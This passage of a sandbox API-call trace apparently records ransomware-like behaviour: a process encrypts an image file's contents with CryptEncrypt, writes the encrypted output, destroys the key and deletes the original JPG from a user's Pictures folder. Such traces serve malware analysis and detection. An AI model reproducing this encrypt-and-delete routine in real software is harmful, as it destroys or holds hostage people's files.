dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0092.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0092.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0092.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0092.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0092.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0092.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0092.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0092.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0092.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0092.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0092.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0092.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0092.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ee8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0092.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0092.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0092.316] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0092.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0092.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0092.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0092.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0092.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0092.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0092.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0092.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0092.316] CryptGetKeyParam (in: hKey=0x41ac700, dwParam=0x7, pbData=0x43e27e0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e27e0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0092.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0092.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0092.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0092.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0092.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0092.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0092.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0092.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0092.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0092.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0092.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0092.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0092.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0092.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0092.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0092.318] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0092.318] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0092.318] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0092.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0092.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0092.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0092.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0092.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0092.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0092.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0092.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0092.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0092.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0092.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0092.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0092.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0092.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0092.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0092.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0092.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0092.319] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0092.319] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0092.319] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0092.319] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.319] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0092.320] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x14b8d, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x14b90) returned 1 [0092.320] CharLowerBuffW (in: lpsz="byte[84881]", cchLength=0xb | out: lpsz="byte[84881]") returned 0xb [0092.320] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.320] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0092.320] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49aeba0*, pdwDataLen=0x144e538*=0x14b8d, dwBufLen=0x14b90 | out: pbData=0x49aeba0*, pdwDataLen=0x144e538*=0x14b90) returned 1 [0092.320] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0092.320] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0092.320] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0092.363] WriteFile (in: hFile=0x258, lpBuffer=0x452aba8*, nNumberOfBytesToWrite=0x14b90, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x452aba8*, lpNumberOfBytesWritten=0x144ef3c*=0x14b90, lpOverlapped=0x0) returned 1 [0092.366] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0092.366] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.366] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca868, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0092.366] CryptDestroyKey (hKey=0x41ac700) returned 1 [0092.366] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0092.366] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0092.366] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0092.366] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0092.366] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0092.367] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0092.367] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.367] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0092.367] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0092.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797088, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0092.367] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0092.367] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.367] FreeLibrary (hLibModule=0x756e0000) returned 1 [0092.367] CloseHandle (hObject=0x298) returned 1 [0092.367] CloseHandle (hObject=0x258) returned 1 [0092.374] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\6EeiE520t8A11Pm.jpg", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\6EeiE520t8A11Pm.jpg", lpFilePart=0x0) returned 0x33 [0092.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d938 [0092.374] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\6EeiE520t8A11Pm.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\6eeie520t8a11pm.jpg")) returned 0x20 [0092.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0092.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0092.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0092.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0092.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0092.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0092.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0092.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0092.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0092.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0092.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e400 [0092.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0092.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0092.375] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\6EeiE520t8A11Pm.jpg", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e5d5b00, ftCreationTime.dwHighDateTime=0x1d5e47f, ftLastAccessTime.dwLowDateTime=0xa9a111f0, ftLastAccessTime.dwHighDateTime=0x1d5ed11, ftLastWriteTime.dwLowDateTime=0xa9a111f0, ftLastWriteTime.dwHighDateTime=0x1d5ed11, nFileSizeHigh=0x0, nFileSizeLow=0x14b8d, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="6EeiE520t8A11Pm.jpg", cAlternateFileName="6EEIE5~1.JPG")) returned 0x41ac6c0 [0092.375] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\6EeiE520t8A11Pm.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\6eeie520t8a11pm.jpg")) returned 1 [0092.411] FindNextFileW (in: hFindFile=0x41ac6c0, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e5d5b00, ftCreationTime.dwHighDateTime=0x1d5e47f, ftLastAccessTime.dwLowDateTime=0xa9a111f0, ftLastAccessTime.dwHighDateTime=0x1d5ed11, ftLastWriteTime.dwLowDateTime=0xa9a111f0, ftLastWriteTime.dwHighDateTime=0x1d5ed11, nFileSizeHigh=0x0, nFileSizeLow=0x14b8d, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="6EeiE520t8A11Pm.jpg", cAlternateFileName="6EEIE5~1.JPG")) returned 0 [0092.412] FindClose (in: hFindFile=0x41ac6c0 | out: hFindFile=0x41ac6c0) returned 1 [0092.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0092.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0092.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0092.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0092.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d938 | out: hHeap=0x1780000) returned 1 [0092.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0092.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0092.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0092.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0092.412] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0092.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0092.412] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0092.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0092.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0092.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0092.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0092.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0092.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 